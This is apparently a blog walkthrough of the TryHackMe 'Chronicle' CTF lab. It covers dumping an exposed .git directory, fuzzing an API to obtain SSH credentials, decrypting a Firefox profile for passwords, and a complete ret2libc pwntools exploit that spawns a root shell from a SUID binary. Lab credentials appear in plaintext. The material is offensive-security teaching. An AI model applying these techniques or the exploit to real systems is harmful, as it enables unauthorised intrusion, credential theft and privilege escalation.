Post

THM - Chronicle

Chronicle (good ret2libc lab - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

Posted Updated
By Trompie
4 min read

THM - Chronicle (good ret2libc lab)

NMAP

image1

http://10.10.200.236/old/

image2

1

gobuster dir -u http://10.10.200.236/old -w /usr/share/seclists/Discovery/Web-Content/big.txt | grep -v 302

image3

Found .git

image4

  • Download .git:
1
2

wget --recursive http://10.10.200.236/old/.git/ --continue

or use (–mirror)

  • Read .git files:
1
2

git status

image5

1
2

git checkout -- .

or

1
2

git restore .

image6

Got the deleted files

Nothing in them.

  • Look at the logs and grep for key:
1
2

git log -p | grep "key"

image7

http://10.10.200.236:8081/forgot

image8

image9

image10

image11

Open in Burp:

image12

image13

Try changing the key value:

image14

Try the API key found in the git logs:

image15

Get - “Invalid Username” this time - so the key works

image16

image17

  • Try fuzzing the right user (API Fuzzing):
1
2

ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"7454c262d0d5a3a0c0b678d6c0dbc7ef"}' -u http://10.10.200.236:8081/api/FUZZ -fw 2

image18

image19

{“username”:”tommy”,”password”:”DevMakesStuff01”}

Credentials to SSH:

image20

1
2

cat user.txt

image21

1

last

image22

Two new IP’s: 192.168.29.217 192.168.166.1

But no network for those IP’s:

image23

carlJ has a .mozilla directory

image24

Copy directory to /tmp Copy the directory over to Kali:

image25

1
2

wget http://10.10.200.236:8082/.mozilla/ --recursive --continue
  • Use firefox_decrypt to get the password:

image26

The second one requires a Primary Password to unlock the profile

Tried some simple passwords:

password1 worked

image27

Username: ‘dev

Password: ‘Pas$w0RD59247

  • su to carlJ

image28

  • Looking in mailing/ there seems to be an executable with SUID permissions (Buffer overflow?)

image29

image30

Seg fault on option 2:

image31

  • Check protections:
1
2

checksec smail

or

1
2

pwn checksec smail

image32

No PIE, so the binary is not affected by ASLR

  • Check if ASLR has been enabled on the system: ```bash cat /proc/sys/kernel/randomize_va_space
1
2
3
4
5
6
7
8
9
10
11
12
13

![image33](../resources/925c5815ee604527a4d8a7609ab32a9f.png)

**0 means NO**

- **Because ASLR is not enabled, we don't need a leak function to get the base address**
**Instead:**

- Getting libc and its base:

```bash
ldd smail

image34

Gives the base address of libc (which can be trusted - because no ASLR)

Also, the base address should end in three 0’s - which it does:

0x7ffff79e2000

  • Getting the location of system():
1
2

readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system

The -s flag tells readelf to search for symbols, for example functions

image35

1403: 000000000004f550 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5

The offset of system from libc base is: 0x4f550

(system = libc_base + 0x4f550)

  • Getting the location of /bin/sh:

Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd.

Note that when passing strings as parameters you need to pass a pointer to the string,

not the hex representation of the string, because that’s how C expects it

1
2

strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh

-a tells it to scan the entire file

-t x tells it to output the offset in hex

image36

/bin/sh address: 0x1b3e1a

  • Because this is a 64bit arch:
    1. Instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register
1
2

ROPgadget --binary smail | grep rdi

image37

ROPgadget lets you search your gadgets on a binary.

It supports several file formats and architectures and uses the Capstone disassembler for the search engine

pop rdi; ret address: 0x4007f3

  1. Find the address of a return function:
1
2

objdump -d smail | grep ret

image38

Return address: 0x400556

  • Copy smail over to Kali

  • chmod +x smail

  • Open with gdb (gef)
1
2

gdb smail

image39

pattern create (copy pattern)

image40

r - To run

Copy pattern into signature

image41

  • Find the offset:
1
2

pattern search $rsp

image42

  • Create the payload (pwntools):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

#!/usr/bin/python3

from pwn import *

p = process('./smail')

# Addresses (example: these would need to match your libc + binary setup)
libc_base = 0x7ffff79e2000
system = libc_base + 0x4f550
binsh = libc_base + 0x1b3e1a
POP_RDI = 0x4007f3  # pop rdi; ret gadget

# Create the payload
payload = b'A' * 72                   # Buffer overflow padding
payload += p64(0x400556)              # Optional stack alignment (ret)
payload += p64(POP_RDI)               # Gadget to control RDI
payload += p64(binsh)                 # "/bin/sh" address
payload += p64(system)                # system("/bin/sh")
payload += p64(0x0)                   # Optional return address

# Interact with the process
p.clean()
p.sendline("2")
p.sendline(payload)
p.interactive()
  • Root shell!

image43

  • If you get the EOF message, check your addresses again to make sure they are correct

image44

CTF, THM
gobuster linux nmap privilege escalation python rce
This post is licensed under CC BY 4.0 by the author.